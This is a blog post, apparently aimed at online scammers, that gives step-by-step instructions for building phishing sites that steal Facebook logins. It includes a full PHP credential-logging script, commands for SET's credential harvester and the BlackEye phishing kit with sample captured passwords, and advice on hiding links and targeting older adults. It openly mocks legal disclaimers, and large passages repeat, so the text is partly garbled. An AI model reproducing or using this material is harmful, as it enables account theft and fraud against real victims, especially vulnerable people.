Howdy, hustler? There is this disturbing hustler in my list requesting for how to create a phishing website. I can’t conceal the secret anymore because a phishing webpage is an essential tool for any online hustle. One of the first stages of becoming a hacker is to learn to phish.
Hiring a web developer to design a phishing website is a BIG mistake to avoid. The reason is that the developer will become aware of your secret. If the web developer is a freaking hustler, he might install viruses that will monitor your phishing activities. In short, it compromises the money you should bill the clients using your phishing website.
Fortunately, you will learn how to create a phishing site with or without programming skills. Yes, there is no mistake in what you just read. You’ll further learn how to create a phishing website with your phone (iOS, HarmonyOS, or Windows) and how to make a phishing site on Android.
The lessons will mainly cover:
For easy understanding, I will indicate when a method is possible with a phone. If it applies to PC only, I will also indicate for you.
So, how can I create a phishing website that works?
How to Create a Phishing Website
For PC
For Android
For PC
What do we do? Below are the steps to integrate the PHP keyword picker in the HTML.
You have to change the permission to 777 and tick all the boxes in the screen prompt. Finally, close the FTP server and copy down your web address.
Note: If you uploaded to the root folder of your web host directory, add http:// just in front of the site.
If you are not sure whether you added, you can test by navigating to http://yourwebsiteforyourpostphpupload/post.php. If it redirects to the website you are phishing, you are good to go. In the case of this article, it will redirect us to www.facebook.com. If there are issues, confirm whether you uploaded it to the file to the right directory. If everything is successful, copy and paste the index.html text in www.htmlpasta.com. Complete the Google reCAPTCHA challenge and click Paste. The action will automatically generate a link for the phishing website you are creating.
If it logs in correctly, navigate to your FTP server, and you should find a Log.txt file. In this guide, the Log.txt file is present where we have the post.php file. Open the Log.txt file and you should find the Facebook login details you attempted in frontend (the user-accessible login page).
Guess what? Your phishing website is ready with the help of 000webhost! Share the link with targets you want to phish. You can also do Facebook phishing to hack a Facebook account successfully.
#Requirements
If you are a root user, simply type setoolkit in the command line. A warning message will appear informing you that this tool is to be used with company authorization or for educational purposes only and that the terms of service will be violated if you use it for malicious purpose. Well, since you will be using it for a malicious purpose, you are already violating the terms of service.
Anyway, type “Y” to agree to the terms and conditions of using the tool. Y stands for yes.
A menu will come up after you insert the “Y” command. Do the following:
Facebook.com is now hosted, and your phishing page is active. So, you can now share with the targets you want to phish. But then, there is a little problem. Clients become suspicious and will not want to use the IP to login to Facebook. Fortunately, there is a solution; what do you do?
You require a link shortening service to conceal the malicious login link before sending out to phishing targets. Some of the link shortening service providers are:
Share the link as Email, text message, social media message, etc. You can increase your phishing chances by targeting older adults or convincing young users to login via the link. Simply tell them that it is the new mode of accessing Facebook or the phishing site that you use for free.
Finally, locate the login details by clicking Home > Root > Var > WWW. Click on the HTML or .txt file for a list of passwords from people that use the link to access their accounts.
Normally, BlackEye is most functional using Kali Linux concerning how to create a phishing page of any website. However, we can install the relevant commands on an Ubuntu or Debian device. Simply update the Kali distro, and you install BlackEye.
Note: We are using facebook.com for this guide to create the phishing page.
Open a terminal window and input the command codes below.
~$ git clone https://github.com/thelinuxchoice/blackeye
Cloning into ‘blackeye’…
remote: Enumerating objects: 361, done.
remote: Total 361 (delta 0), reused 0 (delta 0), pack-reused 361
Receiving objects: 100% (361/361), 8.01 MiB | 3.17 MiB/s, done.
Resolving deltas: 100% (101/101), done.
~$ cd blackeye
~/blackeye$
The command above will install and activate the BlackEye repository. Go to the blackeye folder and run the bash blackeye.sh command. Below is what you should see:
~/blackeye$ bash blackeye.sh :: Disclaimer: Developers assume no liability and are not :: :: responsible for any misuse or damage caused by BlackEye. :: :: Only use for educational purporses!! :: :: Attacking targets without mutual consent is illegal! :: [01] Instagram [17] IGFollowers [33] Custom BLACKEYE v1.1[02] Facebook [18] eBay[03] Snapchat [19] Pinterest[04] Twitter [20] CryptoCurrency[05] Github [21] Verizon[06] Google [22] DropBox[07] Spotify [23] Adobe ID[08] Netflix [24] Shopify[09] PayPal [25] Messenger[10] Origin [26] GitLab[11] Steam [27] Twitch[12] Yahoo [28] MySpace[13] Linkedin [29] Badoo[14] Protonmail [30] VK[15] WordPress [31] Yandex[16] Microsoft [32] devianART
Facebook.com will show an expired copyright notice. If you do not like that, return to the blackeye folder from the bash script and type Is. Typing Is will display the sites folder in the BlackEye repository.
~/blackeye$ ls blackeye.sh LICENSE README.md sites
With the cd sites command, you can still navigate to the sites folder and then reveal the sites by entering Is command. You can then choose the template site to modify for the phishing. For this guide, facebook.com is our interest.
~/blackeye$ cd sites~/blackeye/sites$ ls adobe cryptocurrency facebook google linkedin myspace paypal shopify spotify twitter wordpressbadoo devianart github instafollowers messenger netflix pinterest shopping steam verizon yahoocreate dropbox gitlab instagram microsoft origin protonmail snapchat twitch vk yandex
For you to edit Facebook, retype Is to access the files. It will be similar to the source code below:
~/blackeye/sites$ cd facebook~/blackeye/sites/facebook$ ls index_files index.php ip.php ip.txt login.html login.php saved.ip.txt saved.usernames.txt
Now, edit the HTML source code of facebook.com using any text editor from the app store. Simply open login.html, and you should find the source code for the Facebook login page.
After selecting Facebook as a phishing website, the terminal will request an IP address. Input your IP address, press enter, and you will see something similar to what we have below.
[*] Put your local IP (Default 10.0.6.27): [*] Starting php server…[*] Send this link to the Victim: 72.229.28.185[*] Waiting victim open the link …
You can now navigate to facebook.com for the result of your phishing setup.
#Requirements
Note: We are using facebook.com for the sake of this phishing website guide.
For Name of Log File, you can input any name (name.txt) that you will remember (it is where the logins will be saved).
Use the PHP file name for the Name of PHP File section.
Enter https://www.facebook.com in Site to Redirect To.
Click Build Phisher. Clicking the Build Phisher will generate two output files in the output folder.
Note: If you do not know how to create a web hosting account, you can send me a request email for a hosting account.
From there, you can look for your phishing page URL. If you can’t find the URL, copy the source code in HTML file and paste in www.htmlpasta.com. Complete the reCAPTCHA challenge, and you will see your URL.
Share the phishing link with people you want to phish. Once they use the link to login to Facebook, their login details will be saved to your web account. Navigate to Log.txt file in your hosting account and retrieve the Facebook login details.
If you find it difficult to follow up, then hire a web developer to do the job. But like I mentioned earlier, it is unsafe to hire a developer for your phishing website. Lest I forget, you can also create a phishing e-commerce website to phish credit card details. However, that’s a story for another day.
Phish Safely…
Hiring a web developer to design a phishing website is a BIG mistake to avoid. The reason is that the developer will become aware of your secret. If the web developer is a freaking hustler, he might install viruses that will monitor your phishing activities. In short, it compromises the money you should bill the clients using your phishing website.
Fortunately, you will learn how to create a phishing site with or without programming skills. Yes, there is no mistake in what you just read. You’ll further learn how to create a phishing website with your phone (iOS, HarmonyOS, or Windows) and how to make a phishing site on Android.
What to Consider before you Create a Phishing Website
There are several methods regarding how to create a phishing website for billing. Nevertheless, I welcome the pain to teach you as many methods for creating a phishing website that works. This lesson is also important if you also want to learn to hack a Facebook accountThe lessons will mainly cover:
- how to make a phishing site with 000webhost
- how to make a phishing webpage in Kali Linux
- how to create a phishing site using Android
Note: I recommend Android over any other OS.
Platforms for Creating Webpage for Phishing
The two platforms we will use are:For easy understanding, I will indicate when a method is possible with a phone. If it applies to PC only, I will also indicate for you.
So, how can I create a phishing website that works?
How to Create a Phishing Website
- Method 1: How to Make a Phishing Site with 000webhost
- Method 2: How to Make a Phishing Webpage in Kali Linux
- Method 3: how to create a phishing site using Android
- Method 4: Create a Phishing Website Using Super Phisher
Method 1: How to Make a Phishing Site with 000webhost
Regarding how to create a phishing website, 000webhost is one of the prestigious methods. This method also regards how to make a phishing site using notepad. It requires a PC for the best experience. Nonetheless, you can use an Android phone, but it must have at least 3 gigabytes of RAM storage.
Webhost Cpanel Login
Identify the Target Website and Download the HTML Index
For this guide, we are creating a phishing website out of www.facebook.com.For Android
- Download Naked Browser LTS from Google Play Store
- Visit facebook.com
- Swipe your screen to the right.
- Click View Page Source.
For PC
- Install Firefox or Chrome
- Visit Facebook.com.
- Right-click and select View Source. In some browsers like Firefox, you will see View Source Element.
Copy the HTML Source Code
You now have to select and copy the entire text. This method is purely how to make a phishing site using notepad because it requires either the notepad or WordPad application to be successful.For Android
- Download FX file manager.
- Launch the app and Media Card.
- Click the options button at the top-right screen.
- Click File.
- Click Text.
- Name the file as index.html.
- Paste the Facebook HTML source code.
For PC
- Install a Notepad (recommended) or WordPad.
- Launch the Notepad and paste the HTML source code.
- Click Save As.
- Name the file as index.html.
- Set Save as type as All Files and set Encoding as Unicode.
Create the Password PHP File
This stage is the main deal regarding how to create a phishing page of any website. It is where every Facebook client login password will go for phishing to be successful. Since you have no programming knowledge, copy the code below.<?phpNow, paste this code in your Notepad (PC user) or create a new .txt file using Android (mobile users). Use post.php as the file name and select Unicode for the encoding format.
header (‘Location: facebook.com ‘);
$handle = fopen(“log.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rnnnn”);
fclose($handle);
exit;
?>
Merge the PHP File with the HTML Source Code File
Concerning how to create a phishing web, if we do not integrate the PHP file in the HTML file, phishing won’t work. If you are using an Android phone, download PC Keyboard fromWhat do we do? Below are the steps to integrate the PHP keyword picker in the HTML.
Launch the HTML file with your browser.
Click Ctrl F.
Input “=action” in the provided space.
You should see an underlined part of the codes. Select and replace the portion with “post.php”.
- Open the website.
- Click Login.
- Right-click and view page source. You should find something similar to what we have for Facebook in this article (=action).
Host the PHP File Online with 000webhost
In case you are wondering what the “hosting” means, it is simply the act of making the phishing website available online. Without hosting the PHP file, clients will be unable to access the website, and you will not phish passwords. Do the following to host the files on 000webhost.- Visit 000.webhost.com.
- Sign up for free and confirm your email address.
- Click Upload Files Now.
- Select the Public_html folder and click the upload icon in the toolbar.
- Click Select Files and select the PHP file.
- Hit Upload, and your files will upload to the servers.
You have to change the permission to 777 and tick all the boxes in the screen prompt. Finally, close the FTP server and copy down your web address.
Host the Phishing Page
Regarding how to make a fake website for phishing, it is time to host the phishing webpage. Below are the proper steps towards hosting the phishing page as someone without programming skills.Note: If you uploaded to the root folder of your web host directory, add http:// just in front of the site.
If you are not sure whether you added, you can test by navigating to http://yourwebsiteforyourpostphpupload/post.php. If it redirects to the website you are phishing, you are good to go. In the case of this article, it will redirect us to www.facebook.com. If there are issues, confirm whether you uploaded it to the file to the right directory. If everything is successful, copy and paste the index.html text in www.htmlpasta.com. Complete the Google reCAPTCHA challenge and click Paste. The action will automatically generate a link for the phishing website you are creating.
Test the Website
Visit the phishing website you just created and try to login with any Facebook login detail. When you click login, it should redirect you to www.facebook.com. If there is no redirection, there is a problem. After all, the principle regarding how to create a phishing page step by step is that you remain attentive per step.If it logs in correctly, navigate to your FTP server, and you should find a Log.txt file. In this guide, the Log.txt file is present where we have the post.php file. Open the Log.txt file and you should find the Facebook login details you attempted in frontend (the user-accessible login page).
Guess what? Your phishing website is ready with the help of 000webhost! Share the link with targets you want to phish. You can also do Facebook phishing to hack a Facebook account successfully.
Method 2: How to Make a Phishing Webpage in Kali Linux
This method concerns how to make a phishing webpage in Kali Linux. Unfortunately, mobile users will be unable to create a phishing webpage using this method. The reason is that Kali Linux will not run on mobile. Even if there is a way to run the Kali Linux on mobile, the experience will not be good. So, let’s see how to create a phishing webpage combining Kali Linux and the credential harvester.#Requirements
- Kali Linux
- Social Engineering Toolkit (preinstall in Kali Linux)
- Target phishing website URL.
Launch the Terminal in Kali
First, open the terminal window in Kali and be sure to have root access. If you are a non-root user, type sudo root and enter your password. From the Application options, click the dropdown and select Kali Linux > Exploitation Tools > Social Engineering Toolkit > Setoolkit.If you are a root user, simply type setoolkit in the command line. A warning message will appear informing you that this tool is to be used with company authorization or for educational purposes only and that the terms of service will be violated if you use it for malicious purpose. Well, since you will be using it for a malicious purpose, you are already violating the terms of service.
Anyway, type “Y” to agree to the terms and conditions of using the tool. Y stands for yes.
Social Engineering Attack
Still, on how to create a phishing page step by step, it’s time to play around with the Social Engineering Toolkit. Bear in mind that the essence of this method is to capture user logins and the Social Engineering Toolkit is the password harvester. Let’s proceed!A menu will come up after you insert the “Y” command. Do the following:
- Input 1.
- Input 3 to select Credential Harvester Attack Method.
- Input 2 to select Site Cloner.
Set IP Address for Password Harvesting
Open a new terminal and type in ifconfig. Look for ‘inet’ and copy the IP address you find there. Social Engineering Toolkit will request for the IP address to store the credentials it will capture. Simply paste the IP address you copied in the recent terminal.Input Your Phishing Website
Enter the site you want to use for creating a phishing page. Note that we use facebook.com in this step by step guide for creating a phishing website. Social Engineering Toolkit will request for Apache Server to run while phished data is written to Apache root directory. Input “Y” to allow and the phishing setup for facebook.com is complete.Facebook.com is now hosted, and your phishing page is active. So, you can now share with the targets you want to phish. But then, there is a little problem. Clients become suspicious and will not want to use the IP to login to Facebook. Fortunately, there is a solution; what do you do?
You require a link shortening service to conceal the malicious login link before sending out to phishing targets. Some of the link shortening service providers are:
- ly
- ly
- ClickMeter
- TinyURL
- Rebrandly
- T2M
- gl
Share the link as Email, text message, social media message, etc. You can increase your phishing chances by targeting older adults or convincing young users to login via the link. Simply tell them that it is the new mode of accessing Facebook or the phishing site that you use for free.
Finally, locate the login details by clicking Home > Root > Var > WWW. Click on the HTML or .txt file for a list of passwords from people that use the link to access their accounts.
Method 3: How to Create a Phishing Website with Your Phone
This method is a special method from me to you because I’m aware that about 50% of hustlers have no PC. It requires your phone and BlackEye application. The BlackEye app I have supports phishing on 32 websites. Some of the websites include GitHub, Protonmail, Facebook, Shopify, Twitter, PayPal, Google, Gitlab, Adobe, MySpace, Pinterest, Verizon, etc.Normally, BlackEye is most functional using Kali Linux concerning how to create a phishing page of any website. However, we can install the relevant commands on an Ubuntu or Debian device. Simply update the Kali distro, and you install BlackEye.
Note: We are using facebook.com for this guide to create the phishing page.
Download BlackEye
Before downloading BlackEye, clone the source from the GitHub repository. How do you clone the source correctly?Open a terminal window and input the command codes below.
~$ git clone https://github.com/thelinuxchoice/blackeye
Cloning into ‘blackeye’…
remote: Enumerating objects: 361, done.
remote: Total 361 (delta 0), reused 0 (delta 0), pack-reused 361
Receiving objects: 100% (361/361), 8.01 MiB | 3.17 MiB/s, done.
Resolving deltas: 100% (101/101), done.
~$ cd blackeye
~/blackeye$
The command above will install and activate the BlackEye repository. Go to the blackeye folder and run the bash blackeye.sh command. Below is what you should see:
~/blackeye$ bash blackeye.sh :: Disclaimer: Developers assume no liability and are not :: :: responsible for any misuse or damage caused by BlackEye. :: :: Only use for educational purporses!! :: :: Attacking targets without mutual consent is illegal! :: [01] Instagram [17] IGFollowers [33] Custom BLACKEYE v1.1[02] Facebook [18] eBay[03] Snapchat [19] Pinterest[04] Twitter [20] CryptoCurrency[05] Github [21] Verizon[06] Google [22] DropBox[07] Spotify [23] Adobe ID[08] Netflix [24] Shopify[09] PayPal [25] Messenger[10] Origin [26] GitLab[11] Steam [27] Twitch[12] Yahoo [28] MySpace[13] Linkedin [29] Badoo[14] Protonmail [30] VK[15] WordPress [31] Yandex[16] Microsoft [32] devianART
Modify Facebook.com Page
Right-click and click on the “View Page source”
~/blackeye$ ls blackeye.sh LICENSE README.md sites
With the cd sites command, you can still navigate to the sites folder and then reveal the sites by entering Is command. You can then choose the template site to modify for the phishing. For this guide, facebook.com is our interest.
~/blackeye$ cd sites~/blackeye/sites$ ls adobe cryptocurrency facebook google linkedin myspace paypal shopify spotify twitter wordpressbadoo devianart github instafollowers messenger netflix pinterest shopping steam verizon yahoocreate dropbox gitlab instagram microsoft origin protonmail snapchat twitch vk yandex
For you to edit Facebook, retype Is to access the files. It will be similar to the source code below:
~/blackeye/sites$ cd facebook~/blackeye/sites/facebook$ ls index_files index.php ip.php ip.txt login.html login.php saved.ip.txt saved.usernames.txt
Now, edit the HTML source code of facebook.com using any text editor from the app store. Simply open login.html, and you should find the source code for the Facebook login page.
Build the Facebook.com Phishing Page
Do the following:- Open a new terminal window.
- Navigate to the blackeye folder.
- Run bash blackeye.sh.
- Return to the selection menu of the phishing page where you have a list of phishing websites.
- As you can see in the source code below, Facebook is number 2, so you have to select 02 and press enter.
After selecting Facebook as a phishing website, the terminal will request an IP address. Input your IP address, press enter, and you will see something similar to what we have below.
[*] Put your local IP (Default 10.0.6.27): [*] Starting php server…[*] Send this link to the Victim: 72.229.28.185[*] Waiting victim open the link …
You can now navigate to facebook.com for the result of your phishing setup.
Capture the Password on Facebook
Now, you can share the link to targets and convince them to use the link.[*] Waiting victim open the link … [*] IP Found![*] Victim IP: 72.229.28.185[*] User-Agent: User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0[*] Saved: shopping/saved.ip.txtThe moment your target uses the link to login to facebook.com, BlackEye reports the username, as you can see below.
[*] Waiting credentials … [*] Credentials Found![*] Account: smartlazyhustler[*] Password: thesmartlazyhustler1997[*] Saved: sites/shopping/saved.usernames.txtThe only downside with this method is that it will not work if the target uses 2FA security on his/her account.
Method 4: Create a Phishing Website Using Super Phisher
Super Phisher is a simple tool that phishers do not use very often. It is a straightforward tool to use, and I’ll quickly highlight things to do to create a unique phishing site.#Requirements
Note: We are using facebook.com for the sake of this phishing website guide.
Download and Extract Super Phisher
I can’t include the download link here for obvious reasons. After downloading the Super Phisher, extract the files and launch Super Phisher.Complete the Super Phisher Form
Enter https://www.facebook.com in the URL of Login Page section.For Name of Log File, you can input any name (name.txt) that you will remember (it is where the logins will be saved).
Use the PHP file name for the Name of PHP File section.
Enter https://www.facebook.com in Site to Redirect To.
Click Build Phisher. Clicking the Build Phisher will generate two output files in the output folder.
Create a Webhosting Account
You need to host the files with web hosts that support FTP. I recommend hosting services like t35.com and byethost.com. You can also search for free host services if you don’t want to spend it. Also, note that free hosting makes your phishing website slow and unstable.Note: If you do not know how to create a web hosting account, you can send me a request email for a hosting account.
Host the Phishing Files
Go to Super Phisher and upload the two files you find there to your webhost. Make sure to upload both files to public_html.From there, you can look for your phishing page URL. If you can’t find the URL, copy the source code in HTML file and paste in www.htmlpasta.com. Complete the reCAPTCHA challenge, and you will see your URL.
Share the phishing link with people you want to phish. Once they use the link to login to Facebook, their login details will be saved to your web account. Navigate to Log.txt file in your hosting account and retrieve the Facebook login details.
Top 10 Websites to Use for Phishing
- Netflix
- Chase
- Yahoo
- PayPal
- Apple
- Microsoft
- Amazon
- eBay
NOTE
I do not include download links in my articles for obvious reasons.
Conclusion
So, here is all regarding how to create a phishing page step by step. The exciting thing is that I have painstakingly explained this guide for those without any programming skills. I bet you can’t find any better guide out there unless you wish to spend your data.If you find it difficult to follow up, then hire a web developer to do the job. But like I mentioned earlier, it is unsafe to hire a developer for your phishing website. Lest I forget, you can also create a phishing e-commerce website to phish credit card details. However, that’s a story for another day.
Phish Safely…
Join other Hustlers in LearningDon't Miss Out
0 Comments: